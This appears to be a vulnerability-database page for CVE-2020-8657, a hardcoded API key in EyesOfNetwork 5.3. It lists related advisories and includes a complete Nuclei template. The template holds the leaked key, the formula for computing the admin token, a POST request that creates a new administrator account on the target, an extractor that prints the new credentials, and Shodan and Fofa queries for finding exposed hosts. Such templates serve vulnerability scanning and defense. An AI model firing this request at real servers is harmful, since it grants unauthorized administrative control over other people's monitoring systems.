| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| EyesOfNetwork AutoDiscovery Target Command Execution Exploit | 4 Mar 202000:00 | – | zdt | |
| CVE-2020-8657 | 6 Feb 202000:00 | – | attackerkb | |
| The vulnerability of the EyesOfNetwork (EON) monitoring software, related to the use of pre-installed credentials, allows a perpetrator to gain unauthorized access to protected information and enhance their privileges. | 1 Dec 202100:00 | – | bdu_fstec | |
| CVE-2020-8657 | 2 Mar 202021:31 | – | circl | |
| EyesOfNetwork Use of Hard-Coded Credentials Vulnerability | 3 Nov 202100:00 | – | cisa_kev | |
| Unspecified Vulnerability in EyesOfNetwork | 11 Feb 202000:00 | – | cnvd | |
| CVE-2020-8657 | 6 Feb 202017:48 | – | cve | |
| CVE-2020-8657 | 6 Feb 202017:48 | – | cvelist | |
| Eyes of Network API Insufficient Credential Protection (CVE-2020-8657) | 27 Jul 202200:00 | – | nessus | |
| EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution | 19 Feb 202014:33 | – | metasploit |
| Source | Link |
|---|---|
| exploit-db | www.exploit-db.com/exploits/48025 |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2020-8657 |
id: CVE-2020-8657
info:
name: EyesOfNetwork - Hardcoded API Key
author: daffainfo
severity: critical
description: |
An issue was discovered in EyesOfNetwork 5.3. The installation uses the same API key (hardcoded as EONAPI_KEY in include/api_functions.php for API version 2.4.2) by default for all installations, hence allowing an attacker to calculate/guess the admin access token.
impact: |
Successful exploitation allows an attacker to create administrative users and gain unauthorized access to the EyesOfNetwork management system.
remediation: |
Upgrade to a newer version of EyesOfNetwork or change the default hardcoded API key in the configuration.
reference:
- https://www.exploit-db.com/exploits/48025
- https://nvd.nist.gov/vuln/detail/CVE-2020-8657
classification:
cve-id: CVE-2020-8657
epss-score: 0.91874
epss-percentile: 0.99803
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-798
cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: eyesofnetwork
product: eyesofnetwork
shodan-query: html:"EyesOfNetwork"
fofa-query: title="EyesOfNetwork"
tags: cve,cve2020,eyesofnetwork,hardcoded-key,kev,vkev,vuln
variables:
key: "€On@piK3Y"
userid: "1"
username: "{{randstr}}"
password: "{{randstr}}"
http:
- raw:
- |
POST /eonapi/createEonUser?username=admin&apiKey={{ sha256(md5(key + userid) + Host) }} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"user_name":"{{username}}","user_group":"admins","user_password":"{{password}}"}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"api_version"'
- "200 OK"
- "A new user have been successfully inserted"
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"Username: " + username + ". Password: "+ password'
# digest: 4a0a0047304502207deb644174d6ee53094bdd2ba805f7bbaa77185fb23136153e05000f99b6cdfd022100f453afee27b9ca85a98419730464f7dec5e0a0917e3f7bbc184685c3be8378a2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation